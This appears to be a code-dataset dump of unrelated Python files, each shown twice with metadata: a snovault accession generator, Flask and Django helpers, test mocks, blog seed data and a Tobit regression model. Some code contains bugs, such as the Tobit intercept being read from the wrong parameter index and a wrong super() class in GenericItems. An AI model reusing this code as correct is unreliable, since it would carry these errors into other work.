from pyramid.path import DottedNameResolver
accession_factory = config.registry.settings.get('accession_factory')
if accession_factory:
factory = DottedNameResolver().resolve(accession_factory)
else:
factory = enc_accession
config.registry[ACCESSION_FACTORY] = factory
@server_default
def userid(instance, subschema):
request = get_current_request()
principals = effective_principals(request)
for principal in principals:
if principal.startswith('userid.'):
return principal[7:]
return NO_DEFAULT
@server_default
def now(instance, subschema):
# from jsonschema_serialize_fork date-time format requires a timezone
return datetime.utcnow().isoformat() + '+00:00'
@server_default
def uuid4(instance, subschema):
return str(uuid.uuid4())
@server_default
def accession(instance, subschema):
if 'external_accession' in instance:
return NO_DEFAULT
request = get_current_request()
factory = request.registry[ACCESSION_FACTORY]
# With 17 576 000 options
ATTEMPTS = 10
for attempt in range(ATTEMPTS):
new_accession = factory(subschema['accessionType'])
if new_accession in request.root:
continue
return new_accession
raise AssertionError("Free accession not found in %d attempts" % ATTEMPTS)
ENC_ACCESSION_FORMAT = (digits, digits, digits, ascii_uppercase, ascii_uppercase, ascii_uppercase)
def enc_accession(accession_type):
random_part = ''.join(random.choice(s) for s in ENC_ACCESSION_FORMAT)
return 'D' + accession_type + random_part
TEST_ACCESSION_FORMAT = (digits, ) * 6
def test_accession(accession_type):
""" Test accessions are generated on test.encodedcc.org
"""
random_part = ''.join(random.choice(s) for s in TEST_ACCESSION_FORMAT)
return 'D' + accession_type + random_part
| from datetime import datetime
from jsonschema_serialize_fork import NO_DEFAULT
from pyramid.security import effective_principals
from pyramid.threadlocal import get_current_request
from string import (
digits,
ascii_uppercase,
)
import random
import uuid
from snovault.schema_utils import server_default
ACCESSION_FACTORY = __name__ + ':accession_factory'
def includeme(config):
from pyramid.path import DottedNameResolver
accession_factory = config.registry.settings.get('accession_factory')
if accession_factory:
factory = DottedNameResolver().resolve(accession_factory)
else:
factory = enc_accession
config.registry[ACCESSION_FACTORY] = factory
@server_default
def userid(instance, subschema):
request = get_current_request()
principals = effective_principals(request)
for principal in principals:
if principal.startswith('userid.'):
return principal[7:]
return NO_DEFAULT
@server_default
def now(instance, subschema):
# from jsonschema_serialize_fork date-time format requires a timezone
return datetime.utcnow().isoformat() + '+00:00'
@server_default
def uuid4(instance, subschema):
return str(uuid.uuid4())
@server_default
def accession(instance, subschema):
if 'external_accession' in instance:
return NO_DEFAULT
request = get_current_request()
factory = request.registry[ACCESSION_FACTORY]
# With 17 576 000 options
ATTEMPTS = 10
for attempt in range(ATTEMPTS):
new_accession = factory(subschema['accessionType'])
if new_accession in request.root:
continue
return new_accession
raise AssertionError("Free accession not found in %d attempts" % ATTEMPTS)
ENC_ACCESSION_FORMAT = (digits, digits, digits, ascii_uppercase, ascii_uppercase, ascii_uppercase)
def enc_accession(accession_type):
random_part = ''.join(random.choice(s) for s in ENC_ACCESSION_FORMAT)
return 'D' + accession_type + random_part
TEST_ACCESSION_FORMAT = (digits, ) * 6
def test_accession(accession_type):
""" Test accessions are generated on test.encodedcc.org
"""
random_part = ''.join(random.choice(s) for s in TEST_ACCESSION_FORMAT)
return 'D' + accession_type + random_part
| en | 0.510727 | # from jsonschema_serialize_fork date-time format requires a timezone # With 17 576 000 options Test accessions are generated on test.encodedcc.org | 1.962412 | 2 |
app/__init__.py | geirowew/SapAPI | 1 | 10364 | <reponame>geirowew/SapAPI
from flask import Flask
#from config import Config
import config
app = Flask(__name__)
#app.config.from_object(Config)
app.config.from_object(config)
#from app import routes
from app import gettoken | from flask import Flask
#from config import Config
import config
app = Flask(__name__)
#app.config.from_object(Config)
app.config.from_object(config)
#from app import routes
from app import gettoken | en | 0.138415 | #from config import Config #app.config.from_object(Config) #from app import routes | 1.745832 | 2 |
todo/task/__init__.py | BenMcLean981/flask-todo | 0 | 10365 | """Todo module."""
| """Todo module."""
| es | 0.59867 | Todo module. | 0.969902 | 1 |
src/pvt_model/pvt_system/pipe.py | BenWinchester/PVTModel | 1 | 10366 | <filename>src/pvt_model/pvt_system/pipe.py<gh_stars>1-10
#!/usr/bin/python3.7
########################################################################################
# pvt_collector/pipe.py - Represents a pipe within the system.
#
# Author: <NAME>
# Copyright: <NAME>, 2021
########################################################################################
"""
The pipe module for the PV-T model.
This module represents a pipe within the PV-T system.
"""
from dataclasses import dataclass
__all__ = ("Pipe",)
@dataclass
class Pipe:
"""
Represents a pipe within the PVT system.
.. attribute:: temperature
The temperature of the pipe, measured in Kelvin.
"""
temperature: float
| <filename>src/pvt_model/pvt_system/pipe.py<gh_stars>1-10
#!/usr/bin/python3.7
########################################################################################
# pvt_collector/pipe.py - Represents a pipe within the system.
#
# Author: <NAME>
# Copyright: <NAME>, 2021
########################################################################################
"""
The pipe module for the PV-T model.
This module represents a pipe within the PV-T system.
"""
from dataclasses import dataclass
__all__ = ("Pipe",)
@dataclass
class Pipe:
"""
Represents a pipe within the PVT system.
.. attribute:: temperature
The temperature of the pipe, measured in Kelvin.
"""
temperature: float
| de | 0.32294 | #!/usr/bin/python3.7 ######################################################################################## # pvt_collector/pipe.py - Represents a pipe within the system. # # Author: <NAME> # Copyright: <NAME>, 2021 ######################################################################################## The pipe module for the PV-T model. This module represents a pipe within the PV-T system. Represents a pipe within the PVT system. .. attribute:: temperature The temperature of the pipe, measured in Kelvin. | 2.67348 | 3 |
tests/test_api_account_state.py | luisparravicini/ioapi | 0 | 10367 | import unittest
import os
import json
import requests
import requests_mock
from ioapi import api_url, IOService, AuthorizationError, UnexpectedResponseCodeError
class APIAccountStateTestCase(unittest.TestCase):
def setUp(self):
self.service = IOService()
@requests_mock.mock()
def test_account_state_without_auth(self, mock):
data = self._read_mock_response('account_state_without_auth')
self._setup_response(mock, data, 401)
with self.assertRaises(AuthorizationError):
self.service.get_account_state()
@requests_mock.mock()
def test_account_state_auth_not_ok(self, mock):
data = self._read_mock_response('account_state_not_ok')
for code in range(201, 600):
# skip 401 status code (unauthorized)
if code == 401:
continue
self._setup_response(mock, data, code)
with self.assertRaises(UnexpectedResponseCodeError) as cm:
self.service.get_account_state()
self.assertEqual(cm.exception.status_code, code)
@requests_mock.mock()
def test_account_state(self, mock):
data = self._read_mock_response('account_state')
self.service = IOService()
self._setup_response(mock, data)
self.assertEqual(self.service.get_account_state(), data)
self.fail("auth missing")
def _read_mock_response(self, name):
path = os.path.join(os.path.dirname(__file__), name + '.json')
with open(path, 'r') as file:
data = json.loads(file.read())
return data
def _setup_response(self, mock, response, code=None):
if code is None:
code = requests.codes.ok
mock.get(
self.service.api + api_url.URL_ACCOUNT_STATE,
json=response,
status_code=code)
| import unittest
import os
import json
import requests
import requests_mock
from ioapi import api_url, IOService, AuthorizationError, UnexpectedResponseCodeError
class APIAccountStateTestCase(unittest.TestCase):
def setUp(self):
self.service = IOService()
@requests_mock.mock()
def test_account_state_without_auth(self, mock):
data = self._read_mock_response('account_state_without_auth')
self._setup_response(mock, data, 401)
with self.assertRaises(AuthorizationError):
self.service.get_account_state()
@requests_mock.mock()
def test_account_state_auth_not_ok(self, mock):
data = self._read_mock_response('account_state_not_ok')
for code in range(201, 600):
# skip 401 status code (unauthorized)
if code == 401:
continue
self._setup_response(mock, data, code)
with self.assertRaises(UnexpectedResponseCodeError) as cm:
self.service.get_account_state()
self.assertEqual(cm.exception.status_code, code)
@requests_mock.mock()
def test_account_state(self, mock):
data = self._read_mock_response('account_state')
self.service = IOService()
self._setup_response(mock, data)
self.assertEqual(self.service.get_account_state(), data)
self.fail("auth missing")
def _read_mock_response(self, name):
path = os.path.join(os.path.dirname(__file__), name + '.json')
with open(path, 'r') as file:
data = json.loads(file.read())
return data
def _setup_response(self, mock, response, code=None):
if code is None:
code = requests.codes.ok
mock.get(
self.service.api + api_url.URL_ACCOUNT_STATE,
json=response,
status_code=code)
| en | 0.763347 | # skip 401 status code (unauthorized) | 2.69041 | 3 |
testData/devSeedData.py | bgporter/wastebook | 0 | 10368 | '''
fake posts to bootstrap a development database. Put any interesting cases
useful for development in here.
'''
from datetime import datetime
POST_DATA_1 = [
{
"created" : datetime(2015, 10, 1),
"published": datetime(2015, 10, 1),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "First Post",
"slug": "",
"text": "a bunch of words #foo #bar",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": False,
"status": "published",
"title": "Second Post",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": False,
"status": "draft",
"title": "Third Post",
"slug": "",
"text": "This is a #draft #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "draft",
"title": "Fourth Post",
"slug": "",
"text": "This is a #draft #post",
"tags": [],
"type": "Post"
},
]
POST_DATA_2 = [
{
"created" : datetime(2015, 3, 2),
"published": datetime(2015, 3, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 1",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 4, 2),
"published": datetime(2015, 4, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 2",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 5, 2),
"published": datetime(2015, 5, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 3",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 5, 2),
"published": datetime(2015, 5, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 4",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 5",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 6",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 7",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 7, 2),
"published": datetime(2015, 7, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 8",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 8, 2),
"published": datetime(2015, 8, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 9",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 9, 2),
"published": datetime(2015, 9, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 10",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 11",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
] | '''
fake posts to bootstrap a development database. Put any interesting cases
useful for development in here.
'''
from datetime import datetime
POST_DATA_1 = [
{
"created" : datetime(2015, 10, 1),
"published": datetime(2015, 10, 1),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "First Post",
"slug": "",
"text": "a bunch of words #foo #bar",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": False,
"status": "published",
"title": "Second Post",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": False,
"status": "draft",
"title": "Third Post",
"slug": "",
"text": "This is a #draft #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "draft",
"title": "Fourth Post",
"slug": "",
"text": "This is a #draft #post",
"tags": [],
"type": "Post"
},
]
POST_DATA_2 = [
{
"created" : datetime(2015, 3, 2),
"published": datetime(2015, 3, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 1",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 4, 2),
"published": datetime(2015, 4, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 2",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 5, 2),
"published": datetime(2015, 5, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 3",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 5, 2),
"published": datetime(2015, 5, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 4",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 5",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 6",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 7",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 7, 2),
"published": datetime(2015, 7, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 8",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 8, 2),
"published": datetime(2015, 8, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 9",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 9, 2),
"published": datetime(2015, 9, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 10",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 11",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
] | en | 0.366718 | fake posts to bootstrap a development database. Put any interesting cases useful for development in here. #foo #bar", #secret #post", #draft #post", #draft #post", #secret #post", #secret #post", #secret #post", #secret #post", #secret #post", #secret #post", #secret #post", #secret #post", #secret #post", #secret #post", #secret #post", | 2.63783 | 3 |
customer_support/utils.py | rtnpro/django-customer-support | 1 | 10369 | from __future__ import absolute_import
from django.shortcuts import render
import simplejson
import datetime
from django.http import HttpResponse
class GenericItemBase(object):
ITEM_ATTRS = []
def __init__(self, identifier):
self.identifier = identifier
def jsonify(self, value):
"""
Method to convert non JSON serializable objects into
an equivalent JSON serializable form.
"""
return value
def json(self):
raise NotImplementedError
def render_json(self):
raise NotImplementedError
def render_html(self):
raise NotImplementedError
class GenericItem(GenericItemBase):
TEMPLATE = 'customer_support/item.html'
def __init__(self, *args, **kwargs):
super(GenericItem, self).__init__(*args, **kwargs)
self._item = {}
def get_item(self, identifier):
raise NotImplementedError
def set_item(self, data):
self._item = {}
for key, value in data.items():
if key in self.ITEM_ATTRS:
self._item[key] = value
def json(self):
item = {}
for attr_name in self.ITEM_ATTRS:
attr = self.jsonify(self._item[attr_name])
if isinstance(attr, datetime):
attr = attr.strftime('%Y-%m-%d %H:%M')
item[attr_name] = attr
return simplejson.dumps(item)
def render_json(self):
return HttpResponse(
self.json(), mimetype='application/json')
def render_html(self):
return render(self.TEMPLATE, {'item': self._item})
class GenericItems(GenericItemBase):
TEMPLATE = 'customer_support/items.html'
def __init__(self, *args, **kwargs):
super(GenericItem, self).__init__(*args, **kwargs)
self._items = []
def get_items(self, for_entity):
raise NotImplementedError
def set_items(self, items):
self._items = items
def json(self):
items = []
for item in self._items:
item_dict = {}
for attr_name in self.ITEM_ATTRS:
attr = self.jsonify(item[attr_name])
if isinstance(attr, datetime):
attr = attr.strftime('%Y-%m-%d %H:%M')
item_dict[attr_name] = attr
items.append(item)
return simplejson.dumps(items)
def render_json(self):
return HttpResponse(
self.json(), mimetype='application/json')
def render_html(self):
return render(self.TEMPLATE, {'items': self._items})
class GenericActions(object):
def __init__(self, item_id):
self.item_id = item_id
self.actions = []
def get_actions_for_item(self):
raise NotImplementedError
def json(self):
return simplejson.dumps(self.actions)
def render_json(self):
return HttpResponse(self.json(), mimetype='application/json')
def render_html(self):
pass
| from __future__ import absolute_import
from django.shortcuts import render
import simplejson
import datetime
from django.http import HttpResponse
class GenericItemBase(object):
ITEM_ATTRS = []
def __init__(self, identifier):
self.identifier = identifier
def jsonify(self, value):
"""
Method to convert non JSON serializable objects into
an equivalent JSON serializable form.
"""
return value
def json(self):
raise NotImplementedError
def render_json(self):
raise NotImplementedError
def render_html(self):
raise NotImplementedError
class GenericItem(GenericItemBase):
TEMPLATE = 'customer_support/item.html'
def __init__(self, *args, **kwargs):
super(GenericItem, self).__init__(*args, **kwargs)
self._item = {}
def get_item(self, identifier):
raise NotImplementedError
def set_item(self, data):
self._item = {}
for key, value in data.items():
if key in self.ITEM_ATTRS:
self._item[key] = value
def json(self):
item = {}
for attr_name in self.ITEM_ATTRS:
attr = self.jsonify(self._item[attr_name])
if isinstance(attr, datetime):
attr = attr.strftime('%Y-%m-%d %H:%M')
item[attr_name] = attr
return simplejson.dumps(item)
def render_json(self):
return HttpResponse(
self.json(), mimetype='application/json')
def render_html(self):
return render(self.TEMPLATE, {'item': self._item})
class GenericItems(GenericItemBase):
TEMPLATE = 'customer_support/items.html'
def __init__(self, *args, **kwargs):
super(GenericItem, self).__init__(*args, **kwargs)
self._items = []
def get_items(self, for_entity):
raise NotImplementedError
def set_items(self, items):
self._items = items
def json(self):
items = []
for item in self._items:
item_dict = {}
for attr_name in self.ITEM_ATTRS:
attr = self.jsonify(item[attr_name])
if isinstance(attr, datetime):
attr = attr.strftime('%Y-%m-%d %H:%M')
item_dict[attr_name] = attr
items.append(item)
return simplejson.dumps(items)
def render_json(self):
return HttpResponse(
self.json(), mimetype='application/json')
def render_html(self):
return render(self.TEMPLATE, {'items': self._items})
class GenericActions(object):
def __init__(self, item_id):
self.item_id = item_id
self.actions = []
def get_actions_for_item(self):
raise NotImplementedError
def json(self):
return simplejson.dumps(self.actions)
def render_json(self):
return HttpResponse(self.json(), mimetype='application/json')
def render_html(self):
pass
| en | 0.544425 | Method to convert non JSON serializable objects into an equivalent JSON serializable form. | 2.325929 | 2 |
tobit.py | AlvaroCorrales/tobit | 1 | 10370 | import math
import warnings
import numpy as np
import pandas as pd
from scipy.optimize import minimize
import scipy.stats
from scipy.stats import norm # edit
from scipy.special import log_ndtr
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, mean_absolute_error
def split_left_right_censored(x, y, cens):
counts = cens.value_counts()
if -1 not in counts and 1 not in counts:
warnings.warn("No censored observations; use regression methods for uncensored data")
xs = []
ys = []
for value in [-1, 0, 1]:
if value in counts:
split = cens == value
y_split = np.squeeze(y[split].values)
x_split = x[split].values
else:
y_split, x_split = None, None
xs.append(x_split)
ys.append(y_split)
return xs, ys
def tobit_neg_log_likelihood(xs, ys, params):
x_left, x_mid, x_right = xs
y_left, y_mid, y_right = ys
b = params[:-1]
# s = math.exp(params[-1])
s = params[-1]
to_cat = []
cens = False
if y_left is not None:
cens = True
left = (y_left - np.dot(x_left, b))
to_cat.append(left)
if y_right is not None:
cens = True
right = (np.dot(x_right, b) - y_right)
to_cat.append(right)
if cens:
concat_stats = np.concatenate(to_cat, axis=0) / s
log_cum_norm = scipy.stats.norm.logcdf(concat_stats) # log_ndtr(concat_stats)
cens_sum = log_cum_norm.sum()
else:
cens_sum = 0
if y_mid is not None:
mid_stats = (y_mid - np.dot(x_mid, b)) / s
mid = scipy.stats.norm.logpdf(mid_stats) - math.log(max(np.finfo('float').resolution, s))
mid_sum = mid.sum()
else:
mid_sum = 0
loglik = cens_sum + mid_sum
return - loglik
def tobit_neg_log_likelihood_der(xs, ys, params):
x_left, x_mid, x_right = xs
y_left, y_mid, y_right = ys
b = params[:-1]
# s = math.exp(params[-1]) # in censReg, not using chain rule as below; they optimize in terms of log(s)
s = params[-1]
beta_jac = np.zeros(len(b))
sigma_jac = 0
if y_left is not None:
left_stats = (y_left - np.dot(x_left, b)) / s
l_pdf = scipy.stats.norm.logpdf(left_stats)
l_cdf = log_ndtr(left_stats)
left_frac = np.exp(l_pdf - l_cdf)
beta_left = np.dot(left_frac, x_left / s)
beta_jac -= beta_left
left_sigma = np.dot(left_frac, left_stats)
sigma_jac -= left_sigma
if y_right is not None:
right_stats = (np.dot(x_right, b) - y_right) / s
r_pdf = scipy.stats.norm.logpdf(right_stats)
r_cdf = log_ndtr(right_stats)
right_frac = np.exp(r_pdf - r_cdf)
beta_right = np.dot(right_frac, x_right / s)
beta_jac += beta_right
right_sigma = np.dot(right_frac, right_stats)
sigma_jac -= right_sigma
if y_mid is not None:
mid_stats = (y_mid - np.dot(x_mid, b)) / s
beta_mid = np.dot(mid_stats, x_mid / s)
beta_jac += beta_mid
mid_sigma = (np.square(mid_stats) - 1).sum()
sigma_jac += mid_sigma
combo_jac = np.append(beta_jac, sigma_jac / s) # by chain rule, since the expression above is dloglik/dlogsigma
return -combo_jac
class TobitModel:
def __init__(self, fit_intercept=True):
self.fit_intercept = fit_intercept
self.ols_coef_ = None
self.ols_intercept = None
self.coef_ = None
self.intercept_ = None
self.sigma_ = None
def fit(self, x, y, cens, verbose=False):
"""
Fit a maximum-likelihood Tobit regression
:param x: Pandas DataFrame (n_samples, n_features): Data
:param y: Pandas Series (n_samples,): Target
:param cens: Pandas Series (n_samples,): -1 indicates left-censored samples, 0 for uncensored, 1 for right-censored
:param verbose: boolean, show info from minimization
:return:
"""
x_copy = x.copy()
if self.fit_intercept:
x_copy.insert(0, 'intercept', 1.0)
else:
x_copy.scale(with_mean=True, with_std=False, copy=False)
init_reg = LinearRegression(fit_intercept=False).fit(x_copy, y)
b0 = init_reg.coef_
y_pred = init_reg.predict(x_copy)
resid = y - y_pred
resid_var = np.var(resid)
s0 = np.sqrt(resid_var)
params0 = np.append(b0, s0)
xs, ys = split_left_right_censored(x_copy, y, cens)
result = minimize(lambda params: tobit_neg_log_likelihood(xs, ys, params), params0, method='BFGS',
jac=lambda params: tobit_neg_log_likelihood_der(xs, ys, params), options={'disp': verbose})
if verbose:
print(result)
self.ols_coef_ = b0[1:]
self.ols_intercept = b0[0]
if self.fit_intercept:
self.intercept_ = result.x[1]
self.coef_ = result.x[1:-1]
else:
self.coef_ = result.x[:-1]
self.intercept_ = 0
self.sigma_ = result.x[-1]
return self
def predict(self, x):
return self.intercept_ + np.dot(x, self.coef_)
def score(self, x, y, scoring_function=mean_absolute_error):
y_pred = np.dot(x, self.coef_)
return scoring_function(y, y_pred)
# EDIT - insert marginal effects function
def margins(self, x, k = 0):
"""
Marginal effects on dependent variable of a regressor, identified by coef
:param x: array with all regressors (independent variables) to make a prediction
:param k: coefficient corresponding to the regressor with respect to which we want to take the marginal effects
:return: an array with the marginal effects estimated at each observation's level
The marginal effect of regressor k on individual i's y is defined as the product of coef[k] and the normal cdf
evaluated at x_i * coeff[k] / sigma
"""
return self.coef_[k] * norm.cdf(self.predict(x) / self.sigma_) | import math
import warnings
import numpy as np
import pandas as pd
from scipy.optimize import minimize
import scipy.stats
from scipy.stats import norm # edit
from scipy.special import log_ndtr
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, mean_absolute_error
def split_left_right_censored(x, y, cens):
counts = cens.value_counts()
if -1 not in counts and 1 not in counts:
warnings.warn("No censored observations; use regression methods for uncensored data")
xs = []
ys = []
for value in [-1, 0, 1]:
if value in counts:
split = cens == value
y_split = np.squeeze(y[split].values)
x_split = x[split].values
else:
y_split, x_split = None, None
xs.append(x_split)
ys.append(y_split)
return xs, ys
def tobit_neg_log_likelihood(xs, ys, params):
x_left, x_mid, x_right = xs
y_left, y_mid, y_right = ys
b = params[:-1]
# s = math.exp(params[-1])
s = params[-1]
to_cat = []
cens = False
if y_left is not None:
cens = True
left = (y_left - np.dot(x_left, b))
to_cat.append(left)
if y_right is not None:
cens = True
right = (np.dot(x_right, b) - y_right)
to_cat.append(right)
if cens:
concat_stats = np.concatenate(to_cat, axis=0) / s
log_cum_norm = scipy.stats.norm.logcdf(concat_stats) # log_ndtr(concat_stats)
cens_sum = log_cum_norm.sum()
else:
cens_sum = 0
if y_mid is not None:
mid_stats = (y_mid - np.dot(x_mid, b)) / s
mid = scipy.stats.norm.logpdf(mid_stats) - math.log(max(np.finfo('float').resolution, s))
mid_sum = mid.sum()
else:
mid_sum = 0
loglik = cens_sum + mid_sum
return - loglik
def tobit_neg_log_likelihood_der(xs, ys, params):
x_left, x_mid, x_right = xs
y_left, y_mid, y_right = ys
b = params[:-1]
# s = math.exp(params[-1]) # in censReg, not using chain rule as below; they optimize in terms of log(s)
s = params[-1]
beta_jac = np.zeros(len(b))
sigma_jac = 0
if y_left is not None:
left_stats = (y_left - np.dot(x_left, b)) / s
l_pdf = scipy.stats.norm.logpdf(left_stats)
l_cdf = log_ndtr(left_stats)
left_frac = np.exp(l_pdf - l_cdf)
beta_left = np.dot(left_frac, x_left / s)
beta_jac -= beta_left
left_sigma = np.dot(left_frac, left_stats)
sigma_jac -= left_sigma
if y_right is not None:
right_stats = (np.dot(x_right, b) - y_right) / s
r_pdf = scipy.stats.norm.logpdf(right_stats)
r_cdf = log_ndtr(right_stats)
right_frac = np.exp(r_pdf - r_cdf)
beta_right = np.dot(right_frac, x_right / s)
beta_jac += beta_right
right_sigma = np.dot(right_frac, right_stats)
sigma_jac -= right_sigma
if y_mid is not None:
mid_stats = (y_mid - np.dot(x_mid, b)) / s
beta_mid = np.dot(mid_stats, x_mid / s)
beta_jac += beta_mid
mid_sigma = (np.square(mid_stats) - 1).sum()
sigma_jac += mid_sigma
combo_jac = np.append(beta_jac, sigma_jac / s) # by chain rule, since the expression above is dloglik/dlogsigma
return -combo_jac
class TobitModel:
def __init__(self, fit_intercept=True):
self.fit_intercept = fit_intercept
self.ols_coef_ = None
self.ols_intercept = None
self.coef_ = None
self.intercept_ = None
self.sigma_ = None
def fit(self, x, y, cens, verbose=False):
"""
Fit a maximum-likelihood Tobit regression
:param x: Pandas DataFrame (n_samples, n_features): Data
:param y: Pandas Series (n_samples,): Target
:param cens: Pandas Series (n_samples,): -1 indicates left-censored samples, 0 for uncensored, 1 for right-censored
:param verbose: boolean, show info from minimization
:return:
"""
x_copy = x.copy()
if self.fit_intercept:
x_copy.insert(0, 'intercept', 1.0)
else:
x_copy.scale(with_mean=True, with_std=False, copy=False)
init_reg = LinearRegression(fit_intercept=False).fit(x_copy, y)
b0 = init_reg.coef_
y_pred = init_reg.predict(x_copy)
resid = y - y_pred
resid_var = np.var(resid)
s0 = np.sqrt(resid_var)
params0 = np.append(b0, s0)
xs, ys = split_left_right_censored(x_copy, y, cens)
result = minimize(lambda params: tobit_neg_log_likelihood(xs, ys, params), params0, method='BFGS',
jac=lambda params: tobit_neg_log_likelihood_der(xs, ys, params), options={'disp': verbose})
if verbose:
print(result)
self.ols_coef_ = b0[1:]
self.ols_intercept = b0[0]
if self.fit_intercept:
self.intercept_ = result.x[1]
self.coef_ = result.x[1:-1]
else:
self.coef_ = result.x[:-1]
self.intercept_ = 0
self.sigma_ = result.x[-1]
return self
def predict(self, x):
return self.intercept_ + np.dot(x, self.coef_)
def score(self, x, y, scoring_function=mean_absolute_error):
y_pred = np.dot(x, self.coef_)
return scoring_function(y, y_pred)
# EDIT - insert marginal effects function
def margins(self, x, k = 0):
"""
Marginal effects on dependent variable of a regressor, identified by coef
:param x: array with all regressors (independent variables) to make a prediction
